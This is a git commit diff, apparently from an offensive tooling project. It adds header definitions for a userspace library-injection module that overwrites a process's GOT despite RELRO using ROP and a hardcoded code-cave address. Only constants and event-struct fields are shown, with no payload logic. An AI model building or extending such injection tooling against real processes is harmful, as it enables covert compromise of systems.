Finished injection module at userspace using /proc/<pid>/maps, enables to overwrite the GOT section with RELRO activated

2025-12-25 02:43:07 +08:00 · 2022-04-07 07:11:28 -04:00
parent 96cfda8c1f
commit 3438f5846f
24 changed files with 14973 additions and 14466 deletions
--- a/src/common/constants.h
+++ b/src/common/constants.h
@@ -23,6 +23,7 @@


 //LIBRARY INJECTION WITH ROP
-#define TASK_COMM_NAME_ROP_TARGET "execve_hijack"
+#define TASK_COMM_NAME_ROP_TARGET "simple_timer"
+#define CODE_CAVE_ADDRESS 0x0000000000402e95

 #endif
--- a/src/common/map_common.h
+++ b/src/common/map_common.h
@@ -7,13 +7,21 @@ typedef enum {
    INFO,
    DEBUG,
    EXIT,
-    ERROR
+    ERROR,
+    VULN_SYSCALL
 } event_type_t;

 struct rb_event {
 	int pid;
    char message[RB_EVENT_MAX_MESSAGE_SIZE];
    int code;
+    __u64 syscall_address;
+    __u64 process_stack_return_address;
+    __u64 libc_main_address;
+    __u64 libc_dlopen_mode_address;
+    __u64 libc_malloc_address;
+    __u64 got_address;
+    int relro_active;
    event_type_t event_type;
 };